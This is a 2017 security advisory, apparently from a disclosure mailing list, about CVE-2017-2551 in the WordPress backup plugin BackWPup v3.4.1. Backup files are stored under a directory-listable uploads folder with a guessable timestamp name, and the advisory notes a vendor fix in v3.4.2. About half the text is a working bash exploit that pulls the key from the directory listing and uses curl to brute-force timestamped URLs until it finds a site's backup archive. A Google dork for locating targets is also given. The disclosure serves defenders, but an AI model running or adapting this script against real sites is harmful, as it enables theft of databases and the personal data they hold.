Vulnerability in Wordpress Plugin backwpup v3.4.1 possible brute forcing of backup file download

["Larry W. Cashdollar" <larry0 () me com>]

Title: Vulnerability in Wordpress Plugin backwpup v3.4.1 possible brute forcing of backup file download
Author: Larry W. Cashdollar, @_larry0
Date: 2017-09-08
CVE-ID:[CVE-2017-2551]
Download Site: https://wordpress.org/plugins/backwpup
Vendor: Inpsyde
Vendor Notified: 2017-09-08, fixed v3.4.2
Vendor Contact: plugins () wordpress org
Advisory: http://www.vapidlabs.com/advisory.php?v=201
Description: "The backup plugin BackWPup can be used to save your complete installation including /wp-content/ and push 
them to an external Backup Service, like Dropbox, S3, FTP and many more."
Vulnerability:
There is a weakness in the way backwpup creates and stores the backup files it generates.  It creates a random string 
to obscure the location, but
it uses that same string to create the storage directory under wp-content/uploads/ which in most installations of 
WordPress allows file listings.

Someone looking to steal a copy of the database could simply list the directories in /uploads to find that random 
string and then brute force the location of the file as its structure is just a date and time stamp.  It would take a 
Maximum of 86400 tries to guess if a backup is available for that day.  
Filename format: 
backwpup_ RANDOMSTRINGBACKUPNUMBER_%Y-%m-%d_%H-%i-%s

Default settings are:

%d = Two digit day of the month, with leading zeros
%m = Day of the month, with leading zeros
%Y = Four digit representation for the year
%H = Hour in 24-hour format, with leading zeros
%i = Two digit representation of the minute
%s = Two digit representation of the second

https://wordpress.org/plugins/backwpup


Exploit Code:
        • #!/bin/bash
        • #Exploit for Wordpress Plugin BackWPup v3.4.1
        • #Download https://wordpress.org/plugins/backwpup
        • #CWE-552: Files or Directories Accessible to External Parties
        • #CVE-ID: CVE-2017-2551
        • #Google Dork: inurl:wp-content/uploads/backwpup
        •  
        •  
        • #Add banner about vulnerability
        •  
        • KEY=`curl --silent http://$1/wp-content/uploads/|html2text |grep backups | awk -F- '{print $2}'`
        •  
        • #Add error checking here
        • echo "[+] Getting Unique Key $KEY"
        • DIR="backwpup-$KEY-backups"
        • echo "[+] Checking directory $DIR"
        • WPATH="$DIR/backwpup_$KEY"
        • echo "[+] Creating Path: $WPATH"
        • #use date command here for the default date of current day
        • MONTH=09
        • DAY=07
        • YEAR=2017
        • Z=0
        •  
        • echo "[+] Scanning website for available backups:"
        • for y in `seq -w 0 23`; do
        •         for x in `seq -w 0 59`; do
        •                  Y=`echo "scale=2;($Z/86000)*100"|bc`;
        •                  echo -ne 
"\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b$CWPATH
 $Y%"
        •         for z in `seq -w 0 59`; do
        •                  Z=$(( $Z + 1 ));
        •                  CWPATH="http://$1/wp-content/uploads/$WPATH"01"_"$YEAR"-"$MONTH"-"$DAY"_"$y"-"$x"-"$z".zip";;
        •                  RESULT=`curl -s --head $CWPATH|grep 200`;
        •                 if [ -n "$RESULT" ]; then
        •                  echo ""
        •                  echo "[+] Location $CWPATH Found";
        •                  echo "[+] Received $RESULT";
        •                  echo "Downloading......";
        •                 # wget $CWPATH
        •                   exit;
        •                 fi;
        •         done
        •         done
        • done
        • echo "Completed."
Screen Shots:
Notes: Google Dork: inurl:wp-content/uploads/backwpup